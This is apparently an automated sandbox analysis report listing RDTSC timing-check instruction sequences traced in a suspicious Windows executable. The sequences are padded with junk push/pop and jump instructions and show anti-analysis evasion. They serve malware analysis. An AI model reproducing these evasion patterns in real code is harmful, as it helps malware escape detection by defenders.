Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9FD1D7 second address: 9FD1DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9FD1DB second address: 9FD1EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F8D15422246h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9FD1EB second address: 9FD1EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9FD4FA second address: 9FD530 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F8D15422246h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007F8D1542225Ch 0x00000014 jmp 00007F8D15422256h 0x00000019 js 00007F8D1542224Ch 0x0000001f jne 00007F8D15422246h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9FD530 second address: 9FD54B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D1541FE15h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9FD54B second address: 9FD54F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A03930 second address: A03936 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A03936 second address: A03961 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8D15422246h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F8D15422258h 0x00000010 jc 00007F8D15422246h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A03961 second address: A03980 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 jne 00007F8D1541FE06h 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F8D1541FE0Ah 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A03980 second address: A03986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A03986 second address: A0398A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A023F0 second address: A0241B instructions: 0x00000000 rdtsc 0x00000002 jno 00007F8D15422246h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b je 00007F8D15422246h 0x00000011 jmp 00007F8D15422255h 0x00000016 pop ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 push edi 0x0000001a pop edi 0x0000001b rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A0286A second address: A02870 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A02870 second address: A02876 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A029BD second address: A029E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D1541FE0Eh 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F8D1541FE17h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A029E8 second address: A029F3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jg 00007F8D15422246h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A02B40 second address: A02B44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A02B44 second address: A02B48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A02B48 second address: A02B4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A02B4E second address: A02B54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A02B54 second address: A02B60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F8D1541FE06h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A02B60 second address: A02B64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A02B64 second address: A02B68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A02CD3 second address: A02CD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A02E0C second address: A02E10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A02E10 second address: A02E31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F8D15422255h 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A02E31 second address: A02E38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A02E38 second address: A02E3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A02F98 second address: A02FA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A031FF second address: A03222 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F8D15422246h 0x0000000a popad 0x0000000b jmp 00007F8D15422258h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A03222 second address: A03229 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A0338A second address: A0338E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A0338E second address: A03394 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A03803 second address: A03807 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A0216E second address: A02175 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A02175 second address: A02184 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop ecx 0x00000007 js 00007F8D1542224Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A0A829 second address: A0A836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007F8D1541FE06h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A0A463 second address: A0A468 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A0A468 second address: A0A46E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A10420 second address: A10455 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8D15422246h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c jmp 00007F8D15422258h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F8D1542224Fh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A14F56 second address: A14F60 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8D1541FE0Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A150F7 second address: A15100 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A15298 second address: A152A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A152A1 second address: A152AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F8D15422246h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A15569 second address: A15585 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8D1541FE16h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A1571A second address: A15733 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8D15422253h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A15733 second address: A15738 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A15738 second address: A1574D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8D1542224Dh 0x00000009 pop esi 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A1574D second address: A15768 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jnl 00007F8D1541FE12h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A15768 second address: A1576D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9C43E7 second address: 9C43EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9C43EB second address: 9C43F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9C43F1 second address: 9C442B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8D1541FE19h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F8D1541FE15h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9C44C8 second address: 9C44CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9C44CC second address: 9C44DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9C44DA second address: 9C44E0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A158B7 second address: A158CD instructions: 0x00000000 rdtsc 0x00000002 js 00007F8D1541FE06h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebx 0x0000000d pushad 0x0000000e jc 00007F8D1541FE0Eh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A15A23 second address: A15A28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A1BB4B second address: A1BB4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A1B48E second address: A1B494 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A1B494 second address: A1B4A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jbe 00007F8D1541FE0Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A1B5F0 second address: A1B603 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F8D1542224Ah 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A1B603 second address: A1B609 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A1B609 second address: A1B61C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8D1542224Dh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A1D15D second address: A1D164 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A1D164 second address: A1D181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F8D15422256h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A2345D second address: A23478 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F8D1541FE06h 0x00000008 jne 00007F8D1541FE06h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 jnc 00007F8D1541FE06h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A23478 second address: A2347E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A235CD second address: A235D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A235D3 second address: A235F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jp 00007F8D1542224Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f jns 00007F8D15422246h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A235F2 second address: A235F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A235F6 second address: A23610 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8D1542224Fh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A23760 second address: A23767 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A23767 second address: A23777 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8D1542224Ah 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A23A22 second address: A23A2C instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8D1541FE06h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A23A2C second address: A23A32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A23A32 second address: A23A4D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F8D1541FE10h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edi 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A23D39 second address: A23D7F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D15422255h 0x00000007 jnp 00007F8D15422246h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F8D1542224Bh 0x00000014 jp 00007F8D15422248h 0x0000001a popad 0x0000001b pushad 0x0000001c jnl 00007F8D1542224Eh 0x00000022 push eax 0x00000023 push edx 0x00000024 push edx 0x00000025 pop edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A242DE second address: A242E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A242E2 second address: A242FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jg 00007F8D1542224Ah 0x0000000e push esi 0x0000000f pop esi 0x00000010 pushad 0x00000011 popad 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jne 00007F8D15422246h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A242FF second address: A24338 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F8D1541FE17h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jmp 00007F8D1541FE17h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A24338 second address: A24355 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8D15422258h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A24355 second address: A2435B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A2518C second address: A251A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8D1542224Fh 0x00000009 jng 00007F8D15422246h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A251A7 second address: A251B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A2BFCC second address: A2BFD6 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8D15422246h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A2BFD6 second address: A2BFDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A2FED2 second address: A2FED8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A2FED8 second address: A2FEDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A2FEDC second address: A2FEF4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D15422254h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A2FEF4 second address: A2FF00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A2FF00 second address: A2FF1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8D15422258h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A2FF1E second address: A2FF24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A2FF24 second address: A2FF2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A2FF2A second address: A2FF47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8D1541FE0Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F8D1541FE0Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A2F38F second address: A2F3B7 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8D15422246h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8D15422250h 0x00000013 jng 00007F8D1542224Eh 0x00000019 push edi 0x0000001a pop edi 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A2F3B7 second address: A2F3BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: A2F3BB second address: A2F3E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8D15422256h 0x00000009 jmp 00007F8D1542224Fh 0x0000000e rdtsc
